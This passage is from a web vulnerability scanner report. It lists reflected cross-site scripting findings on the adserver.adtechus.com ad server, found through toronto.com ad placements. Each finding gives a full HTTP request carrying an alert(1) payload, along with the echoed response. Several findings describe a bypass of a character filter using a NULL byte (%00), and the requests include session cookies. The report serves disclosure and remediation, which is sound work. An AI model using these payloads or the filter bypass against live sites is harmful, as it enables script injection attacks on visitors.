2.119. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59289'-alert(1)-'e1de6942288 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=59289'-alert(1)-'e1de6942288 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18996

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('965613'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=384526163;nodecode=yes;link=59289'-alert(1)-'e1de6942288')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE965613+"'))";
AT_TARGET965613="_self";
}
window.AT_ClickFn965613= function (click)
{    click=(isNaN(
...[SNIP]...

2.120. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0061d2c'-alert(1)-'92b4a6927d2 was submitted in the loc parameter. This input was echoed as 61d2c'-alert(1)-'92b4a6927d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=%0061d2c'-alert(1)-'92b4a6927d2 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19026

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('965613'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=388823999;nodecode=yes;link=%0061d2c'-alert(1)-'92b4a6927d2')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE965613+"'))";
AT_TARGET965613="_self";
}
window.AT_ClickFn965613= function (click)
{    click=(isNaN(
...[SNIP]...

2.121. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2ad"-alert(1)-"7a1ab3ca94e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=&cc2ad"-alert(1)-"7a1ab3ca94e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19026

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=384531287;nodecode=yes;link=&cc2ad"-alert(1)-"7a1ab3ca94e=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.122. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00b6ee9"-alert(1)-"4092935581c was submitted in the loc parameter. This input was echoed as b6ee9"-alert(1)-"4092935581c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=440;misc=1290207938478;aduho=-360;rdclick=%00b6ee9"-alert(1)-"4092935581c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3025

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
p://adserver.adtechus.com/adlink/5214/965634/0/5/AdId=616420;BnId=1;itime=359139080;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00b6ee9"-alert(1)-"4092935581chttp://fune.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.123. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afa9"-alert(1)-"5e2918b53ea was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916659;aduho=-360;rdclick=1afa9"-alert(1)-"5e2918b53ea HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3096

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/965634/0/5/AdId=701254;BnId=1;itime=210259538;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=1afa9"-alert(1)-"5e2918b53eahttp://www.toronto.com/restaurants/listing/000-142-237\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.124. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004485d"-alert(1)-"9bfdb9ede27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4485d"-alert(1)-"9bfdb9ede27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898454;aduho=-360;rdclick=&%004485d"-alert(1)-"9bfdb9ede27=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
r.adtechus.com/adlink/5214/965634/0/5/AdId=1081588;BnId=1;itime=210267210;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%004485d"-alert(1)-"9bfdb9ede27=1http://www.theindiankitchen.com/\" target=\"_blank\">
...[SNIP]...

2.125. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76aef"-alert(1)-"1f777c09e51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887141;aduho=-360;rdclick=&76aef"-alert(1)-"1f777c09e51=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3025

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965634/0/5/AdId=616420;BnId=1;itime=210263216;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&76aef"-alert(1)-"1f777c09e51=1http://fune.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.126. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965664/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0270"-alert(1)-"fce7a17ea8f was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965664/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_1;size=300x250;key=;grp=353;misc=1290373582641;aduho=-360;rdclick=f0270"-alert(1)-"fce7a17ea8f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1972

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965664/0/170/AdId=1114797;BnId=1;itime=384574978;nodecode=yes;link=f0270"-alert(1)-"fce7a17ea8fhttp://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.127. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965664/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9970b"-alert(1)-"82e6e6fe384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965664/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_1;size=300x250;key=;grp=353;misc=1290373582641;aduho=-360;rdclick=&9970b"-alert(1)-"82e6e6fe384=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 861

document.write("<SCR"+"IPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N3474.OliveNetwork/B4968347;sz=300x250;click=http%3A//adserver.adtechus.com/adlink%2F5214%2F965664%2F0%2F170%2FA
...[SNIP]...
<A HREF=\"http://adserver.adtechus.com/adlink/5214/965664/0/170/AdId=1257126;BnId=1;itime=384575931;nodecode=yes;link=&9970b"-alert(1)-"82e6e6fe384=1http://ad.doubleclick.net/jump/N3474.OliveNetwork/B4968347;sz=300x250;ord=384575931?\">
...[SNIP]...

2.128. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4b2"-alert(1)-"c3b22b0e939 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898573;aduho=-360;rdclick=6b4b2"-alert(1)-"c3b22b0e939 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
erver.adtechus.com/adlink/5214/965669/0/5/AdId=1081584;BnId=1;itime=210259843;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=6b4b2"-alert(1)-"c3b22b0e939http://www.penelopes.com\" target=\"_blank\">
...[SNIP]...

2.129. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007731e"-alert(1)-"3e904f9efd4 was submitted in the loc parameter. This input was echoed as 7731e"-alert(1)-"3e904f9efd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916800;aduho=-360;rdclick=%007731e"-alert(1)-"3e904f9efd4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2042

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
er.adtechus.com/adlink/5214/965669/0/5/AdId=1218159;BnId=1;itime=359142360;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%007731e"-alert(1)-"3e904f9efd4http://tartan.sites.toronto.com/\" target=\"_blank\">
...[SNIP]...

2.130. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965669/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0072162"-alert(1)-"24189c1587b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72162"-alert(1)-"24189c1587b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965669/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_4;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887265;aduho=-360;rdclick=&%0072162"-alert(1)-"24189c1587b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
